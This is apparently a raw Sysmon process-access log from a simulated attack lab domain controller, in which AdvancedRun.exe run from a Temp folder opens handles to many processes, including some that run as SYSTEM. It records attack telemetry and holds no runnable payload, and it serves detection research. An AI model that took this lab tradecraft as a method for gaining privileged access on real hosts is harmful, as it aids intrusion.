C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.926{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.926{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.924{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004078640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.921{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorAT